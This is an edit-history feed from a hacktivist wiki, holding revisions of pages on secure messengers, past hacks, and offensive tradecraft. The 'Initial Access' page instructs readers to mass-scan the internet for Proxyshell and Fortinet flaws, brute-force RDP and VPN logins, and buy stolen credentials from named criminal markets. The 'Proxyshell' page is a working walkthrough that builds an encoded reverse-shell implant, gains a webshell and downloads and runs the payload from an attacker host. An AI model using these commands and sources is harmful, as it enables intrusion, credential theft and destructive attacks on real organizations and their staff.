Enlace Hacktivista - User contributions [en]

Secure Messaging Applications

2023-12-01T08:21:45Z

Mxwgn:

== Recommended Applications ==

* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted email
* Probably the most mature jabber client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])
* https://www.thunderbird.net A email client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])

For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the whonix wiki].

Secure Messaging Applications

2023-12-01T08:19:21Z

Mxwgn:

== Recommended Applications ==

* [https://tails.net Tails] comes with onionshare for file sharing, pidgin with OTR for encrypted chat, and thunderbird with GPG for encrypted e-mail
* Probably the most mature jabber client with a focus on security and privacy is [https://coy.im/ CoyIM] | [https://github.com/coyim/coyim GitHub] ([http://qvt3o2ipzxx3gtoyafd3ptqwsxjs52enlwlxuryn2xjkm7hnp5icd6yd.onion Tor])
* https://cwtch.im ([http://cwtchim3z2gdsyb27acfc26lup5aqbegjrjsqulzrnkuoalq5h4gmcid.onion Tor])
* https://www.thunderbird.net A email client with built-in support for [https://support.mozilla.org/en-US/kb/openpgp-thunderbird-howto-and-faq PGP encryption]
* https://onionshare.org ([http://lldan5gahapx5k7iafb3s4ikijc4ni7gx5iywdflkba5y2ezyg6sjgyd.onion Tor])

For a more detailed comparison of secure messaging software, see [https://www.whonix.org/wiki/Chat the whonix wiki].

Secure Messaging Applications

2023-12-01T08:19:07Z

Mxwgn:

Freedom Hosting II

2023-11-27T08:32:31Z

Mxwgn:

'''Freedom Hosting II''' (popularly, FreedomHII or FHII), is a ''free anonymous hosting service'', with PHP/MySQL support, FTP, unlimited traffic and other features. A successor to Freedom Hosting, it was responsible for hosting 15-20% of active websites, in the [https://mascherari.press/onionscan-report-september-2016-uptime-downtime-and-freedom-hosting-ii/ september 2016, OnionScan Project ScanList (.press)].

FHII hosted everything from personal or collective websites and blogs, to forums, cryptocurrency wallet websites, and even, inappropriate or illegal content.

== Downfall of Freedom Hosting II ==

The hosting of child pornography is what led to the downfall of FHII. Despite the clear rule about "zero tolerance for child pornography," the hosting of the main site about it, Lolita City, triggered Operation DarkNet's focus on the service. According to the statement posted on the homepage at the time, more than 50% child pornography was found on the server.

Carried out on behalf of Anonymous, the Hackers' actions during the invasion were described separately. These being:

# The invasion and takeover of the server Hacker(s) take control of the service, in addition to making the publication on the front page, officially.
# Added the contact e-mail, in case the party is interested in contacting you.
# Database dump added
# Added instructions, on how to get access to the system.
# Added system files (possibly for recovery).

=== Images ===
# [https://video-images.vice.com/_uncategorized/1486233091715-Screenshot-from-2017-02-04-18-16-16.png Home page image]
# [https://video-images.vice.com/_uncategorized/1486233191971-meethod.jpeg Image alleging the method of invasion]

=== References ===
# [https://www.vice.com/en/article/d7x47m/talking-to-the-hacker-who-took-down-a-fifth-of-the-dark-web Vice, Motherboard (.com)]
# [http://zqktlwiuavvvqqt4ybvgvi7tyo4hjl5xgfuvpdf6otjiycgwqbym2qad.onion/wiki/Freedom_Hosting The Hidden Wiki | About Freedom Hosting (.onion)]

Roskomnadzor

2023-11-27T08:30:34Z

Mxwgn:

Hack of over 360,000 files or 820GB of data from the Russian Federal Service for Supervision of Communications, Information Technology and Mass Media, commonly known as Roskomnadzor. the government agency responsible for monitoring, controlling and censoring Russian mass media and the internet.

https://ddosecrets.com/wiki/Roskomnadzor

The hacker who identified themselves only as being part of the hacktivist collective Anonymous stated that they urgently felt the Russian people should have access to information about their government's involvement in the Russo-Ukrainian War. They also expressed their opposition to the Russian people being cut off from independent media and the outside world.

== Explanation of the Hack ==

According to the hacker:
I found a mailserver that had the word Roskomnadzor in the SMTP banner. I checked what's on the same /24 subnet and found a Windows 2008 domain controller. With a public IP address. I tried zerologon and it worked. Then I copied all of the files that were on a fileserver on the local network.
See [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#zerologon PayloadsAllTheThings] for a reference on testing for and exploiting zerologon.

== Media Coverage ==
* https://www.vice.com/en/article/xgdmj7/russian-censorship-roskomnadzor-hacked-leak-distributed-denial-of-secrets
* https://torrentfreak.com/anonymous-hacks-russias-roscomnadzor-site-blocking-agency-220311/
* https://www.nytimes.com/interactive/2022/09/22/technology/russia-putin-surveillance-spying.html

[[Category:Hacks]]

Sons of Confederate Veterans

2023-11-27T08:25:09Z

Mxwgn:

Hack of website of the U.S, neo-confederate organization, Sons of Confederate Veterans exposing names, addresses, telephone numbers and e-mail addresses of almost 59,000 past and present members.

[https://www.theguardian.com/us-news/2021/jun/28/neo-confederate-group-members-politicians-military-officers Revealed: neo-Confederate group includes military officers and politicians] (The Guardian)

== Explanation of the Hack ==

The organization’s website had been misconfigured, allowing access to membership rolls, recruiting data, and other information about the internal workings of the group. The website has had the security issue for a number of years, according to the hacktivist.

Sons of Confederate Veterans

2023-11-27T08:24:51Z

Mxwgn: mini fix

Hack of website of the U.S, neo-confederate organization Sons of Confederate Veterans exposing names, addresses, telephone numbers and e-mail addresses of almost 59,000 past and present members.

[https://www.theguardian.com/us-news/2021/jun/28/neo-confederate-group-members-politicians-military-officers Revealed: neo-Confederate group includes military officers and politicians] (The Guardian)

== Explanation of the Hack ==

The organization’s website had been misconfigured, allowing access to membership rolls, recruiting data, and other information about the internal workings of the group. The website has had the security issue for a number of years, according to the hacktivist.

Cloud Hacking

2023-11-27T08:23:04Z

Mxwgn: mini fix

== Amazon - AWS ==
* https://hackingthe.cloud/aws/general-knowledge/aws_organizations_defaults

== Microsoft - Azure ==
* https://hackingthe.cloud/azure/abusing-managed-identities
* https://www.synacktiv.com/en/publications/azure-ad-introduction-for-red-teamers.html
* https://blog.xpnsec.com/azuread-connect-for-redteam
* AAD Connect Cloud Sync: as local admin impersonate or retrieve managed password of the provagentgMSA account to dcsync.
** see: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#reading-gmsa-password
* https://www.blackhillsinfosec.com/webcast-getting-started-in-pentesting-the-cloud-azure
* https://github.com/dafthack/CloudPentestCheatsheets/blob/master/cheatsheets/Azure.md
* https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

=== Microsoft Office 365 - o365 ===
* Extremely in-depth technical info on everything https://o365blog.com

== Google Cloud Platform - GCP ==
* https://cloud.hacktricks.xyz/pentesting-cloud/gcp-security
* https://hackingthe.cloud/gcp/general-knowledge/client-credential-search-order

== Cloud Hacking Tools ==
* https://github.com/nyxgeek/o365recon - Retrieve information via O365 and AzureAD with a valid cred
* https://github.com/dirkjanm/ROADtools - A collection of Azure AD tools for offensive and defensive security purposes
* https://github.com/fox-it/adconnectdump - Dump Azure AD Connect credentials for Azure AD and Active Directory
* https://github.com/LMGsec/o365creeper - Python script that performs e-mail address validation against Office 365 without submitting login attempts.
* https://github.com/rvrsh3ll/TokenTactics - Azure JWT Token Manipulation Toolset
* https://github.com/nyxgeek/onedrive_user_enum - OneDrive user enumeration - pentest tool to enumerate valid o365 users
* https://github.com/dafthack/MSOLSpray - A password spraying tool for Microsoft Online accounts (Azure/O365)
* https://github.com/dafthack/MFASweep - A tool for checking if MFA is enabled on multiple Microsoft Services

Initial Access Tactics, techniques and procedures

2023-11-27T08:22:01Z

Mxwgn: mini fix

== Phishing ==
[https://www.frontiersin.org/articles/10.3389/fcomp.2021.563060/full Phishing] is the most common attack method favored by advanced persistent threat groups and cyber criminal organized gangs. This is because it relies on social engineering to trick the target to either download a malicious e-mail attachment or click on a malicious link.

==== Tools ====
* https://0xboku.com/2021/07/12/ArtOfDeviceCodePhish.html
* https://medium.com/maltrak/com-objects-p-2-your-stealthy-fileless-attack-bf78318d9165
* https://infosecwriteups.com/recipe-for-a-successful-phishing-campaign-part-1-2-dc23d927ec55
* https://www.xanthus.io/mastering-the-simulated-phishing-attack
* https://github.com/Arno0x/EmbedInHTML
* https://github.com/L4bF0x/PhishingPretexts
* http://lockboxx.blogspot.com/2018/12/gophish-evilginx2-for-phishing.html
* https://book.hacktricks.xyz/phishing-methodology
* https://outflank.nl/blog/2020/03/30/mark-of-the-web-from-a-red-teams-perspective
* https://delta.navisec.io/a-pentesters-guide-part-4-grabbing-hashes-and-forging-external-footholds/
* https://www.rootshellsecurity.net/ntlm_theft-a-tool-for-file-based-forced-ntlm-hash-disclosure/
* https://getgophish.com/ Be sure to [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* https://github.com/curtbraz/PhishAPI
* https://github.com/edoverflow/can-i-take-over-xyz
* https://blog.sublimesecurity.com/red-team-techniques-gaining-access-on-an-external-engagement-through-spear-phishing/
* Phishing with GoPhish and DigitalOcean: https://www.ired.team/offensive-security/initial-access/phishing-with-gophish-and-digitalocean | [https://www.sprocketsecurity.com/blog/never-had-a-bad-day-phishing-how-to-set-up-gophish-to-evade-security-controls remove the identifying headers gophish adds]
* Phishing with MS Office: https://www.ired.team/offensive-security/initial-access/phishing-with-ms-office

== Password Attacks ==
Groups like [https://www.microsoft.com/en-us/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/ Lapsus$] show's the world that you don't need to be a great technical hacker to pwn massive corporations and if common password and multi-factor authentication (MFA) attacks work on the likes of [https://en.wikipedia.org/wiki/Lapsus$ Uber, Rockstar games, Okta and so on] then they will work on our hacktivist targets!

If your target uses multi-factor authentication you can try either [https://www.forbes.com/sites/daveywinder/2022/09/18/has-uber-been-hacked-company-investigates-cybersecurity-incident-as-law-enforcement-alerted social engineering] or MFA fatigue.

=== Usernames ===
Create a bespoke username word list based on OSINT, recon, permutations and your targets employee LinkedIn, website and other social media profiles to aid in your password attacks to develop possible usernames and e-mails for password spraying.

* https://github.com/digininja/CeWL
* https://github.com/Mebus/cupp
* https://github.com/digininja/RSMangler
* https://github.com/sc0tfree/mentalist
* https://github.com/urbanadventurer/username-anarchy
* https://github.com/vysecurity/LinkedInt
* https://github.com/initstring/linkedin2username
* https://github.com/shroudri/username_generator

=== Passwords ===
Common and leaked credentials to test login portals and network services.

==== Default passwords ====
* https://cirt.net/passwords
* https://default-password.info
* https://datarecovery.com/rd/default-passwords
* https://github.com/ihebski/DefaultCreds-cheat-sheet

==== Common and leaked passwords ====
* https://wiki.skullsecurity.org/index.php?title=Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords
* https://github.com/danielmiessler/SecLists/tree/master/Passwords/Leaked-Databases
* https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

=== Password cracking tools ===

* https://github.com/byt3bl33d3r/SprayingToolkit
* https://www.kali.org/tools/hydra
* https://www.kali.org/tools/brutespray
* https://www.kali.org/tools/medusa
* https://www.kali.org/tools/patator
* https://github.com/1N3/BruteX

=== Searching leaks ===
* https://github.com/khast3x/h8mail [Free but includes paid services]

==== Services ====
'''Please note: DO NOT use intelx[.]io as they [https://web.archive.org/web/20230319045845/https://twitter.com/_IntelligenceX/status/1610302930069889024 have been seen doxing hackers] in the past and [https://web.archive.org/web/20230323031901/https://blog.intelx.io/2020/07/05/why-we-are-going-to-block-tor-ips block the use of Tor]. AVOID!'''

You can use services that compile COMBO lists (leaked credentials) to search for your targets domain, then download the results and use them in a password attack to see whether or not your target recycles their credentials.

* https://haveibeenpwned.com
* https://leak-lookup.com [Paid. Accepts crypto (XMR & BTC)]
* https://dehashed.com [Paid. Accepts crypto (BTC)]

Once your leaks have been downloaded you can [https://archive.ph/C8tI2 parse] your results in the format, e-mail:pass.

=== Password spraying ===
Employees commonly use recycled and weak credentials for convenience. If you already have valid passwords you can try and spray them across different services to test whether they have been recycled on other services or not. You can also take common passwords [https://github.com/danielmiessler/SecLists/blob/master/Passwords/common_corporate_passwords.lst (Spring2023)] and spray them hoping an employee uses a weak and guessable credential.

* https://github.com/dafthack/MSOLSpray
* https://pentestlab.blog/2019/09/05/microsoft-exchange-password-spraying
* https://github.com/blacklanternsecurity/TREVORspray
* https://github.com/knavesec/CredMaster
* https://github.com/xFreed0m/RDPassSpray
* https://github.com/dafthack/MailSniper

=== Hash cracking ===
[https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Hash%20Cracking.md Crack password hashes] using both online and offline tools!

==== Identify hash ====
* https://github.com/blackploit/hash-identifier

==== Online tools ====
* https://hashes.com/en/decrypt/hash [Free & Paid]
* https://crackstation.net

==== Offline tools ====
* https://github.com/hashcat/hashcat
* https://github.com/openwall/john
* https://github.com/NotSoSecure/password_cracking_rules

== Buying access ==

You can use the russian market to purchase credentials stolen from targets through the use of info stealer malware. Search your target here to see if you can make a quick win gaining access to an employee account. Any account that allows internal access is always a great start.
* http://flydedxmmddhgt3vfhv6om63ra2u2x4jxginulhxb6nzcnj3wwgavwyd.onion [Paid]

You can also find access brokers selling network access inside of companies on forums. Services include but is not limited to account credentials, shells, implants, and other remote management software (RDP, VPN, SSH, etc).

* https://xss.is ([http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion Tor])
* https://exploit.in [Paid] ([https://exploitivzcm5dawzhe6c32bbylyggbjvh5dyvsvb5lkuz5ptmunkmqd.onion Tor])

== Spray and pray ==
As seen by [https://enlacehacktivista.org/hackback2.webm Guacamaya], hacktivists can benefit from a highly targeted spray and pray campaign whereby you scan IP ranges of countries of interest or your target companies IP ranges for critical vulnerabilities and attack protocols with a password attack. In the case of Guacamaya they scanned and exploited proxyshell and yoinked all their target e-mails out of their Microsoft exchange e-mail servers and leaked them. You can also do the same! See [https://enlacehacktivista.org/index.php?title=Scanning_and_Recon scanning and recon] for tools such as [https://github.com/projectdiscovery/nuclei nuclei] and the [https://nmap.org/book/nse.html nmap scripting engine] (NSE) to then vulnerability scan the IP addresses you discover.

=== Prerequisites ===
There are some prerequisites you will need to follow the below examples:
# Virtual or Dedicated server ([https://enlacehacktivista.org/index.php?title=Opsec_Measures OPSEC])
# Basic [https://www.hackthebox.com/blog/learn-linux command line knowledge]
# Terminal multiplexers such as [https://github.com/tmux/tmux/wiki Tmux] or [https://www.gnu.org/software/screen/ Gnu/Screen] to maintain your scanning and hacking session
# Administration skills such as [https://www.redhat.com/sysadmin/eight-ways-secure-ssh SSH] and [https://www.ssh.com/academy/ssh/scp#basic-usage SCP].

=== Networks ===
==== Vulnerability Scanning ====
We can use a vulnerability scanning spray and pray technique on [https://attack.mitre.org/techniques/T1190 publicly facing applications] to masscan the internet or specific IP ranges for critical vulnerabilities that we can later exploit and gain initial access into target networks with. Here we scan for and exploit both Proxyshell and CVE-2018-13379 as they are both high severity and critical CVE vulnerabilities. In your attacks focus on [https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-215a new] and [https://www.cisa.gov/news-events/cybersecurity-advisories/aa22-117a old] CVE vulnerabilities that are commonly exploited.

Here we port scan IP ranges for either the entire internet or specific country IP ranges, append those ports to the end of the IP address separated with a colon and then proceed to vulnerability scan the discovered hosts before finally exploiting the identified vulnerabilities.

'''IP Ranges''':
* List all IP ranges from popular cloud providers: https://kaeferjaeger.gay/?dir=ip-ranges
* IP Address Ranges by Country: https://lite.ip2location.com/ip-address-ranges-by-country ([https://github.com/ip2location/ip2location-python-csv-converter parse output])
* CIDR country-level IP data, straight from the Regional Internet Registries, updated hourly: https://github.com/herrbischoff/country-ip-blocks
* [https://github.com/robertdavidgraham/masscan#how-to-scan-the-entire-internet Scan the entire internet:] 0.0.0.0/0

===== Proxyshell =====
'''Tool''': [https://github.com/robertdavidgraham/masscan masscan]

'''1.''' Scan for [https://www.mandiant.com/resources/blog/pst-want-shell-proxyshell-exploiting-microsoft-exchange-servers Proxyshell]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt</code>

* <code>sed -i 's/$/:443/' results.txt</code>

*<code>[https://github.com/projectdiscovery/nuclei nuclei] -l results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2021/CVE-2021-34473.yaml nuclei-templates/http/cves/2021/CVE-2021-34473.yaml] -o vulns.txt</code>

Exploit Discovered hosts: [[Proxyshell]]

===== CVE-2018-13379 =====
'''2.''' Scan for [https://www.ic3.gov/Media/News/2021/210402.pdf CVE-2018-13379]:
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://github.com/herrbischoff/country-ip-blocks ranges.txt] --rate 50000 -p4443,10443,8443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] --output-format list --output-file results.txt</code>
* <code>awk '{ print $4 ":" $3 }' results.txt > final_results.txt</code>
* <code>[https://github.com/projectdiscovery/nuclei nuclei] -l final_results.txt -t [https://github.com/projectdiscovery/nuclei-templates/blob/main/http/cves/2018/CVE-2018-13379.yaml nuclei-templates/http/cves/2018/CVE-2018-13379.yaml] -o vulns.txt</code>
Exploit Discovered hosts: [[Fortinet SSL VPN Path Traversal]]

'''Tool''': [https://github.com/zmap/zmap zmap]

'''1.''' Scan for Microsoft Exchange E-mail Servers:
<pre>
sudo zmap -q -p 443 | httpx -silent -s -sd -location \
> | awk '/owa/ { print substr($1,9) }' > owa.txt
</pre>
'''2.''' Vulnerability scan discovered hosts for [[Proxyshell]] using [https://github.com/GossiTheDog/scanning/blob/main/http-vuln-exchange-proxyshell.nse NSE]
<pre>
nmap -p 443 -Pn -n \
> --script http-vuln-exchange-proxyshell.nse -iL owa.txt
</pre>

[https://enlacehacktivista.org/hackback2.webm Exploit Discovered hosts]

===== Domains =====
Mass subdomain enumerating, port scanning and vulnerability scanning domains at the start of an operation when targeting a country or specific TLDs (.gov) is a great way to get a lot of coverage and find low hanging fruit vulnerabilities which may serve as the initial access vector when hacking your targets.

See [[Domain Spray and Pray]] scanning.

==== Password Attacks ====
A lot of organizations use VPNs and RDPs to allow employees and third-party contractors to remotely connect into the internal network of the organization. For either developer, testing, lazy administration or forgotten about servers these systems can be left running with weak or default credentials with no multi-factor authentication in place. Port scan the internet for ports they commonly run on, cross referencing against Shodan for standard and non-standard ports then use common and default credentials.

===== RDP =====
'''1.''' [https://github.com/galkan/crowbar Remote Desktop (RDP) Brute forcing]:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p3389 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code>
* <code>[https://github.com/vanhauser-thc/thc-hydra hydra] -L [https://github.com/danielmiessler/SecLists/tree/master/Usernames usernames.txt] -P [https://github.com/danielmiessler/SecLists/tree/master/Passwords passwords.txt] -M targets.txt -t 16 rdp -o results</code>

===== VPN =====
'''2.''' Virtual Private Network (VPN) Brute forcing:
 
* <code>sudo [https://github.com/robertdavidgraham/masscan masscan] -Pn -sS -iL [https://enlacehacktivista.org/images/4/4b/Latin_american_ranges.txt ranges.txt] --rate 50000 -p10443,443 --open-only --excludefile [https://gist.github.com/ozuma/fb21ab0f7143579b1f2794f4af746fb2 block.txt] | grep -Eo '[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+' > results.txt></code>
* To brute-force see: https://enlacehacktivista.org/index.php?title=VPN_brute_forcing

To Do

2023-11-27T08:20:08Z

Mxwgn: updated

These pages need special attention and work.

= Empty Articles =

These pages have no content at all.

'''[[Special:WantedPages|Red links]]'''

* [[AnibalLeaks]]‏‎
* [[Bob Otto emails]]‏
* [[LeakyMails]]‏‏‎
* [[Salvini emails]]‏
* [[Sarah Palin emails‏]]
* [[Syria emails]]‏‎‎

'''Uncreated pages'''

* DCCC Hack
* DNC Email hacks
* Guccifer
* OPM Hack
* [[Sabu]]
* SolarWinds
* The Shadow Brokers
* [[Albert Gonzalez]]
* [[Max Butler]]

= Stubs =
These pages have minimal content, but need to be expanded.

'''[[Category:Stub_pages|Stub pages]]'''

== Hacks ==

* [[Berat Albayrak Emails]]
* [[Bureau Of Justice]]
* [[Cayman National Bank and Trust (Isle of Man)]]
* [[Chinga la Migra]]
* [[CorruptBrazil]]
* [[CSLEA]]
* [[Epik]]
* [[Flexispy]]
* [[Fuck FBI Friday]]
* [[Gamma Group]]
* [[Hacking Team]]
* [[HBGary]]
* [[Luanda Leaks]]
* [[LulzSecPeru]]
* [[Milico Leaks]]
* [[Norton AntiVirus]]
* [[Operation Payback]]
* [[Policía Nacional Civil de El Salvador]]
* [[Project AIG]]
* [[Russian Interior Ministry]]
* [[Shooting Sheriffs Saturday]]
* [[Sownage]]
* [[Stratfor]]
* [[Surkov Leaks]]
* [[Varela Leaks‏]]

== Hackers ==

* [[AntiSec]]
* [[CyberHunta]]
* [[FocaLeaks]]
* [[Jeremy Hammond]]
* [[Legion Of Doom]]
* [[Maksym Igor Popov]]
* [[Rui Pinto]]
* [[Tillie Kottmann]]
* [[Ukrainian Cyber Troops]]
* [[Walter Delgatti]]

= Orphans =
These pages and files have been created, but aren't linked to.

== Pages ==

'''[[Special:LonelyPages|Orphaned pages]]'''

* [[Jeremy Hammond]]
* [[Legion Of Doom]]
* [[Maksym Igor Popov]]
* [[Masters of Deception]]
* [[Walter Delgatti]]

== Files ==

Pronico

2023-11-27T08:17:25Z

Mxwgn:

Pronico operates the Fenix mine in Guatemala, which has a long history of human rights abuses, environmental damage, and resistance by the surrounding communities.

== Media Coverage ==
English:
* https://ddosecrets.com/wiki/Mining_Secrets
* https://forbiddenstories.org/case/mining-secrets/
* https://www.theguardian.com/global-development/2022/mar/06/indigenous-groups-oppose-restarting-guatemala-nickel-mine
* https://www.occrp.org/en/investigations/mining-secrets-major-nickel-producer-accused-of-polluting-guatemalas-largest-lake#

Spanish:
* https://www.prensacomunitaria.org/2022/03/diez-claves-para-leer-la-investigacion-miningsecrets/
* https://forbiddenstories.org/es/case/mining-secrets/
* https://elpais.com/internacional/2022-03-06/asi-se-compra-un-estado-como-una-minera-rusa-corrompio-a-todos-los-poderes-en-guatemala.html
* https://www.prensacomunitaria.org/2022/03/solway-la-minera-senalada-de-espionaje-a-periodistas-rechaza-acusaciones/
* https://www.prensacomunitaria.org/2022/03/secreto-minero-una-investigacion-sobre-las-estrategias-de-una-mina-rusa-en-guatemala6/
* https://elfaro.net/es/202203/centroamerica/26055/Filtraci%C3%B3n-de-documentos-confirma-cooptaci%C3%B3n-del-Estado-guatemalteco-por-empresa-minera.htm
* https://storeproject.squarespace.com/secretos-mineros/espionaje-y-criminalizacion
* https://desinformemonos.org/la-version-caribena-de-una-red-criminal-entre-rusos-suizos-y-chapines-en-guatemala/
* https://desinformemonos.org/%d0%b3%d0%b2%d0%b0%d1%82%d0%b5%d0%bc%d0%b0%d0%bb%d0%b0-los-senores-del-polvo-rojo-y-los-senores-del-polvo-blanco/
* https://desinformemonos.org/%d0%b3%d0%b2%d0%b0%d1%82%d0%b5%d0%bc%d0%b0%d0%bb%d0%b0-guatemala-se-escribe-en-ruso/

== Hack ==
The hack was done by a group calling themselves [[Guacamaya]]
* [https://enlacehacktivista.org/comunicado_guacamaya.txt Statement by the hackers]
* [https://forbiddenstories.org/the-struggle-of-one-territory-must-be-the-struggle-of-all/ Interview]
* [[Media:Pronico.png|Screenshot]] of a statement posted to Pronico's website by the hackers

=== Video ===
The hackers published a video showing in detail how they hacked Pronico, downloaded files and emails to leak, and then repeatedly sabotaged the company's computers over the course of 6 months. It can be downloaded [https://enlacehacktivista.org/hackback.webm here] or watched [https://kolektiva.media/w/twJjCTkvumnugRy61BjD3T here.] Credits for the video's soundtrack is available [https://enlacehacktivista.org/guacamaya_soundtrack.txt here]

==== Video Timeline ====
<nowiki>
0:51 Introduction
2:05 ProxyLogon
5:35 Other methods of initial access
7:15 Get Domain Admin via dumping LSA secrets
13:35 Lateral movement onto other servers
15:40 Backdooring a switch
21:42 Golden Tickets
25:08 Eternal Blue
32:56 Enabling wdigest and dumping passwords with mimikatz
33:53 Grabbing VPN and saved browser passwords of sysadmin
40:26 Scanning for SMB shares
42:45 Exfiltrating files
49:09 Enabling file sharing via group policy
54:35 Exfiltrating e-mail
1:03:22 Wiping company's storage servers
1:11:31 Wiping computers with Kaspersky
1:13:07 Wiping servers using diskpart
1:14:46 Wiping Office 365
1:24:16 Wiping windows domain with Bitlocker
1:40:28 Stealthy persistence and avoiding AV with dnscat2
1:45:28 Avoiding AV with mimikatz
1:47:03 Wiping storage servers via iscsi
2:06:18 Avoiding AV to exploit PrintNightmare
2:13:35 Wiping windows domain with sdelete
</nowiki>

[[Category:Hacks]]

WebDetetive

2023-11-27T08:15:30Z

Mxwgn: fix

150,000 files from the spyware reseller WebDetetive, a phone monitoring app typically installed on phones without the user's consent (or even knowledge). The software uploads the contents of the user's phone to its servers, messages, call logs, phone call recordings, photos, ambient recordings from the phone’s microphone and GPS data.

The data does not include files from the victims devices. WebDetetive does not verify customer e-mail addresses when signing up.

== Media Coverage ==
# https://ddosecrets.com/wiki/WebDetetive
# https://techcrunch.com/2023/08/26/brazil-webdetetive-spyware-deleted/

Proxyshell

2023-11-27T08:14:13Z

Mxwgn:

== Exploiting proxyshell - CVE-2021-34473 ==
* (Book) Mastering Metasploit: Exploit systems, cover your tracks, and bypass security controls with the Metasploit 5.0 framework, 4th Edition
I found that using <code>exploit/windows/http/exchange_proxyshell_rce</code> doesn't work but [https://github.com/Udyz/proxyshell-auto proxyshell-auto] does for gaining RCE. Here we use both the exploit and a meterpreter to compromise vulnerable hosts.
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Metasploit%20-%20Cheatsheet.md Metasploit - Cheatsheet]

=== Build meterpreter ===
First we make an implant to perform post exploitation using metasploit:

<code>msfvenom -p windows/meterpreter/reverse_https LHOST=1.2.3.4 LPORT=8888 -e x86/shikata_ga_nai -i 5 -f exe -o meterpreter.exe</code>

Now we set our listener:
<pre>
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 1.2.3.4
set LPORT 8888
run
</pre>

Host meterpreter for download:

<pre>python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
</pre>

=== Gain a shell ===
We first use [https://github.com/Udyz/proxyshell-auto proxyshell-auto exploit] which will give us a shell if the exchange server has powershell enabled.

Gain a shell:
<pre>
user@host:~$ python3 proxyshell-auto/proxyshell.py -t 10.10.10.11
fqdn srvexchange2016.domain.local
+ Administrator@domain.com
legacyDN /o=COMPANY/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=cc84dab2b5f8407ea1545e2f024382aa-Administrator
leak_sid S-1-5-21-654894352-2732664023-2722231124-500
token VgEAVAdXaW5kb3dzQwBBCEtlcmJlcm9zTBxBZG1pbmlzdHJhdGV1ckBwZWNoZXhwb3J0Lm1nVSxTLTEtNS0yMS02NTQ4OTQzNTItMjczMjY2NDAyMy0yNzIyMjMxMTI0LTUwMEcBAAAABwAAAAxTLTEtNS0zMi01NDRFAAAAAA==
set_ews Success with subject grvshwaveotkomvc
write webshell at aspnet_client/yhuzv.asPx
<Response [404]>
nt authority\system
SHELL>
</pre>
From here we want to [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Download%20and%20Execute.md download a meterpreter payload] for post exploitation:

<code>SHELL> powershell.exe Invoke-WebRequest -Uri "http://1.2.3.4:8000/meterpreter.exe" -OutFile "c:\Windows\Temp\svchost.exe"</code>

We now set our listener and execute the payload:

<code>SHELL> powershell.exe "c:\windows\Temp\svchost.exe"</code>

From here we will have a meterpreter connection to work from :)
<pre>
[*] Started HTTPS reverse handler on https://1.2.3.4:8888
[*] https://1.2.3.4:8888 handling request from 10.10.10.11; (UUID: qdghnakk) Staging x86 payload (176732 bytes) ...
[*] Meterpreter session 1 opened (1.2.3.4:8888 -> 10.10.10.11:1984) at 2023-07-05 08:00:18 +0000
meterpreter > sysinfo
Computer : srvexchange2016
OS : Windows 2016+ (10.0 Build 14393).
Architecture : x64
System Language : en_US
Domain : DOMAIN
Logged On Users : 6
Meterpreter : x86/windows
</pre>

=== E-mail exfiltration ===
For exfiltrating e-mails via [https://github.com/Jumbo-WJB/Exchange_SSRF proxyshell exploitation] see [https://enlacehacktivista.org/hackback2.webm Guacamaya's tutorial HackBack video].

Secure Messaging Applications

2023-11-27T08:12:48Z

Mxwgn: mini improviment

== Recommended Applications ==

* [https://element.io/ Element/Matrix] A secure communications platform built around you.
* [https://xmpp.org/ XMPP] The universal messaging standard.
* [https://onionshare.org Onionshare] Privacy + Productivity.
* [https://tox.chat/ Tox] A New Kind of Instant Messaging.
* [https://briarproject.org/ Briar] Secure messaging, anywhere.
* [https://signal.org/ Signal] Speak Freely.
